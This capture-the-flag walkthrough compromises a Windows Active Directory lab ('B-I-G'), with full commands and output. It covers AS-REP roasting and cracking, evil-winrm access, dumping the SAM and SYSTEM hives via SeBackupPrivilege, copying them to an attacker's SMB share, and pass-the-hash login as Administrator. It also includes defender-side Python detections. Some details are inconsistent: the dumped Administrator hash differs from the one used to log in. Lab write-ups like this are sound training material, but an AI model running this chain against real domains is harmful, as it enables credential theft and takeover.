Lab: The Hackers Labs
URL: https://thehackerslabs.com/b-i-g/
OS: Windows
Topics: BloodHound usage, abusing SeBackupPrivilege
Start by scanning all ports.
└─$ nmap -sV -sC -Pn -p- -oN port.log $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 21:59 CST
Nmap scan report for 192.168.56.155
Host is up (0.00077s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-10 05:00:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bbr.thl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: bbr.thl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:D4:4D:EB (VMware)
Service Info: Host: BIG; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 14h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: BIG, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:d4:4d:eb (VMware)
| smb2-time:
| date: 2024-11-10T05:00:56
|_ start_date: 2024-11-10T04:55:36
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.66 seconds
Port 80 is open, so enumerate the web directories.
gobuster dir -u http://$IP -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.asp,.aspx,.txt -b 401,403,404,500 -o 80.log
...
/images (Status: 301) [Size: 152] [--> http://192.168.56.155/images/]
/Images (Status: 301) [Size: 152] [--> http://192.168.56.155/Images/]
/contents (Status: 301) [Size: 154] [--> http://192.168.56.155/contents/]
/IMAGES (Status: 301) [Size: 152] [--> http://192.168.56.155/IMAGES/]
/songs (Status: 301) [Size: 151] [--> http://192.168.56.155/songs/]
/Contents (Status: 301) [Size: 154] [--> http://192.168.56.155/Contents/]
/Songs (Status: 301) [Size: 151] [--> http://192.168.56.155/Songs/]
The contents directory holds a notify.txt file; it hints at the username music and mentions that a password was hashed with MD5.
└─$ curl http://$IP/contents/notify.txt
Who the hell did you hire to create the website!
Hiding keys in MD5 again!
I'm going to fire that guy
music
The songs directory contains 4 files: Skyisthelimit.txt is actually a password list, and the other 3 are song lyrics.
Open the home page and view the source; it contains a CSS comment. According to the official walkthrough, the MD5 hash of that comment is one of the passwords, which is a truly wild design choice.
<!DOCTYPE html>
<html>
<head>
<style>
/* It was all a dream */
body {
background-image: url('big1.jpg');
background-size: cover;
background-repeat: no-repeat;
background-attachment: fixed;
background-position: center;
}
</style>
</head>
<body>
<h1>Music</h1>
<p>I keep it music music, I eat that lunch (Yeah)</p>
</body>
</html>
Hashing the comment gives the first password.
└─$ echo -n "It was all a dream" |md5sum
99ae77c0c0faf78b872f9f452e3eaa24
The images directory contains 4 pictures. After downloading them, big2.jpg turns out to have a file hidden in it with steghide; the extraction passphrase is the MD5 value just obtained.
└─$ steghide extract -sf big2.jpg
Enter passphrase:
wrote extracted data to "frase.txt".
The extracted file contains another password.
└─$ cat frase.txt
Bigpoppa1972
This password belongs to the user music; checking it against SMB and WinRM confirms it works.
└─$ crackmapexec smb $IP -u music -p $(cat frase.txt)
SMB 192.168.56.155 445 BIG [*] Windows 10 / Server 2016 Build 14393 x64 (name:BIG) (domain:bbr.thl) (signing:True) (SMBv1:False)
SMB 192.168.56.155 445 BIG [+] bbr.thl\music:Bigpoppa1972
└─$ crackmapexec winrm $IP -u music -p $(cat frase.txt)
SMB 192.168.56.155 5985 BIG [*] Windows 10 / Server 2016 Build 14393 (name:BIG) (domain:bbr.thl)
HTTP 192.168.56.155 5985 BIG [*] http://192.168.56.155:5985/wsman
WINRM 192.168.56.155 5985 BIG [+] bbr.thl\music:Bigpoppa1972 (Pwn3d!)
Use the music account to collect BloodHound data.
└─$ netexec ldap $IP -u 'music' -p 'Bigpoppa1972' --bloodhound --collection All --dns-server $IP
SMB 192.168.56.155 445 BIG [*] Windows 10 / Server 2016 Build 14393 x64 (name:BIG) (domain:bbr.thl) (signing:True) (SMBv1:False)
LDAP 192.168.56.155 389 BIG [+] bbr.thl\music:Bigpoppa1972
LDAP 192.168.56.155 389 BIG Resolved collection methods: trusts, rdp, session, objectprops, group, container, psremote, localadmin, dcom, acl
LDAP 192.168.56.155 389 BIG Done in 00M 00S
LDAP 192.168.56.155 389 BIG Compressing output into /home/kali/.nxc/logs/BIG_192.168.56.155_2024-11-12_080032_bloodhound.zip
In BloodHound, run the query for users vulnerable to AS-REP roasting; it returns the user song.
The Impacket script then retrieves song's AS-REP hash.
└─$ impacket-GetNPUsers bbr.thl/song:Bigpoppa1972
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Cannot authenticate song, getting its TGT
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$song@BBR.THL:49281aed4411ba3db90e463c3a4944ea$c2b0a9de855a1717cbad6343efaf10610204dbd547ffdf38861aa1191184943ecaf2486f0a72e2300f66d269304468fa36fcac5c54d41db26704710664568e4663ec846228eb68b9cd17e444f8181b11791ea8b1b8c8de79e8e1de9fda2de1c81e2acd544d5fd3e3ac87faf87c115d8bf150dccd6f4b9bdca4dda08fc2f628d58c866ec9f5ebfa6ad6b9bcf15cd575d8d9ed5d87a959f21f234a10c7a637280518d1094b3615464572c74367bf735d2672a9c107fe1d40ccd5c1670c665406a702d4c57db7993b40cef10349b0c3d51898d74dde12e2ab62d5d7c17a6fd638c5afdc
Save the hash above to a file and crack it with the password list found earlier (Skyisthelimit.txt) to recover song's password.
└─$ john --wordlist=Skyisthelimit.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Passwordsave@ ($krb5asrep$23$song@BBR.THL)
1g 0:00:00:00 DONE (2024-11-10 11:52) 33.33g/s 6700p/s 6700c/s 6700C/s 123456..qwerty123456
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
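From the defender's side, the two things worth checking after reading the AS-REP section above are which accounts have Kerberos pre-authentication disabled and whether the domain controller is issuing TGTs without pre-authentication. The following is an added example, not part of the original write-up or the lab: the userAccountControl values and the Security event 4768 records are constructed here, and the field names (TargetUserName, PreAuthType, TicketEncryptionType, IpAddress) follow the XML schema of Windows event 4768.

```python
"""Defender-side checks for the AS-REP roasting path described above.

Added example, not from the original write-up. The account data and the 4768
events below are constructed; field names follow Windows Security event 4768.
"""
from typing import Dict, Iterable, List

# userAccountControl bit that disables Kerberos pre-authentication
# (ADS_UF_DONT_REQUIRE_PREAUTH). Accounts with it set are AS-REP roastable.
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Ticket encryption type 0x17 is RC4-HMAC (etype 23), the format john
# labelled "$krb5asrep$23$" above; it is the cheap one to crack offline.
ETYPE_RC4_HMAC = "0x17"

# Constructed userAccountControl values, as an LDAP export would return them.
SAMPLE_ACCOUNTS: Dict[str, int] = {
    "music": 0x10200,   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "song": 0x410200,   # same, plus DONT_REQUIRE_PREAUTH -> roastable
    "Guest": 0x10202,   # NORMAL_ACCOUNT | ACCOUNTDISABLE | DONT_EXPIRE_PASSWORD
}


def roastable_accounts(accounts: Dict[str, int]) -> List[str]:
    """Return the names whose userAccountControl has pre-auth disabled."""
    return sorted(name for name, uac in accounts.items()
                  if uac & UF_DONT_REQUIRE_PREAUTH)


# Constructed 4768 (TGT request) events. PreAuthType "0" means the KDC issued
# the TGT with no pre-authentication at all; normal clients show "2"
# (PA-ENC-TIMESTAMP) or a PKINIT type (15-17). The 4769 record is a TGS
# request and carries no PreAuthType, so it must be ignored.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "music", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.56.20"},
    {"EventID": 4768, "TargetUserName": "song", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.56.101"},
    {"EventID": 4769, "TargetUserName": "song",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.56.101"},
]


def flag_asrep_roasting(events: Iterable[dict]) -> List[dict]:
    """Flag TGTs issued without pre-authentication. Those encrypted with RC4
    are the ones an attacker can crack offline, as the write-up shows."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("PreAuthType") != "0":
            continue
        etype = str(ev.get("TicketEncryptionType", "")).lower()
        hits.append({
            "user": ev["TargetUserName"],
            "source": ev["IpAddress"],
            "etype": etype,
            "crackable_offline": etype == ETYPE_RC4_HMAC,
        })
    return hits


if __name__ == "__main__":
    print("accounts with pre-auth disabled:", roastable_accounts(SAMPLE_ACCOUNTS))
    for hit in flag_asrep_roasting(SAMPLE_EVENTS):
        print("AS-REP roast indicator:", hit)
```

Run it as-is to see song flagged on both checks. In a real environment the account dictionary would come from an LDAP query for userAccountControl, and the events from the DC's Security log; the logic stays the same. Clearing the DONT_REQUIRE_PREAUTH flag on song, or at least giving such accounts a long random password, is what closes the path the write-up uses.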
Log in as song and check the token privileges: the account holds SeBackupPrivilege.
└─$ evil-winrm -i $IP -u song -p Passwordsave@
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\TEMP\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
*Evil-WinRM* PS C:\Users\TEMP\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\TEMP\Documents> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\TEMP\Documents> dir
Directory: C:\Users\TEMP\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/10/2024 10:56 AM 36864 sam
-a---- 11/10/2024 10:56 AM 10543104 system
*Evil-WinRM* PS C:\Users\TEMP\Documents> cp sam \\192.168.56.101\kal
*Evil-WinRM* PS C:\Users\TEMP\Documents> cp system \\192.168.56.101\kali
Open the exported sam and system hives locally to obtain the Administrator hash.
└─$ impacket-secretsdump LOCAL -system system -sam sam
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xbb33617256ea48219d9d3d01766b7a9e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb1c50a48c37e053d2045cd5b55cd2f2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
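Two things a defender would want from the SeBackupPrivilege section above: a quick way to spot backup/restore privileges in a `whoami /priv` listing such as the one shown, and a detection for the `reg save hklm\sam` / `reg save hklm\system` commands that turn that privilege into credential material. The block below is an added example, not part of the original write-up; the `whoami /priv` text is a constructed copy of the listing above, and the command lines are constructed as they might appear in a Sysmon event 1 or Security event 4688 CommandLine field.

```python
"""Defender-side checks for the SeBackupPrivilege path described above.

Added example, not from the original write-up. The whoami /priv text and the
command lines are constructed samples.
"""
import re
from typing import Dict, List

# Backup/restore privileges let their holder read or write any file and
# registry hive regardless of ACLs, so a token carrying them is effectively
# local admin. SeBackupPrivilege alone suffices to export HKLM\SAM and HKLM\SYSTEM.
BACKUP_OPERATOR_PRIVILEGES = {"SeBackupPrivilege", "SeRestorePrivilege"}

# Constructed copy of the `whoami /priv` output shown above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeMachineAccountPrivilege     Add workstations to domain           Enabled
SeSystemtimePrivilege         Change the system time               Enabled
SeBackupPrivilege             Back up files and directories        Enabled
SeRestorePrivilege            Restore files and directories        Enabled
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system  Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled
"""


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Map privilege name -> state from `whoami /priv` output.
    Rows follow the '====' separator; the name is the first token and the
    state the last, with the free-text description in between."""
    privs: Dict[str, str] = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("====="):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        privs[parts[0]] = parts[-1]
    return privs


def dangerous_privileges(privs: Dict[str, str]) -> List[str]:
    """Backup/restore privileges present in the token, whatever their state:
    a privilege listed as Disabled can be enabled by the holder at will."""
    return sorted(p for p in privs if p in BACKUP_OPERATOR_PRIVILEGES)


# Matches `reg save` / `reg.exe save` (optionally quoted path) of the three
# credential-bearing hives; hive names are case-insensitive on Windows.
HIVE_DUMP_RE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+hklm\\(sam|system|security)\b',
    re.IGNORECASE,
)

# Constructed CommandLine values as Sysmon event 1 / event 4688 would log them.
SAMPLE_COMMANDLINES = [
    r'reg save hklm\sam sam',
    r'"C:\Windows\system32\reg.exe" save HKLM\SYSTEM C:\Users\TEMP\Documents\system',
    r'reg query hklm\software\microsoft\windows\currentversion\run',
    r'robocopy D:\data \\fileserver\backup /MIR /B',
]


def flag_hive_dumps(cmdlines: List[str]) -> List[str]:
    """Return the command lines that export SAM, SYSTEM or SECURITY to a file."""
    return [c for c in cmdlines if HIVE_DUMP_RE.search(c)]


if __name__ == "__main__":
    privs = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    print("backup/restore privileges in token:", dangerous_privileges(privs))
    for cmd in flag_hive_dumps(SAMPLE_COMMANDLINES):
        print("hive export detected:", cmd)
```

The privilege check is what an access review should run against members of Backup Operators and any custom group that grants these rights; the command-line pattern is one signal for a SIEM rule, and the 4663 object-access events on the hive files (with the "backup" semantics in the access mask) are a second one worth pairing with it.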
With the hash, log in as Administrator and the box is owned.
└─$ evil-winrm -i $IP -u administrator -H 5d48bcf84aea999fb1ade06970a81237
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
bbr\administrator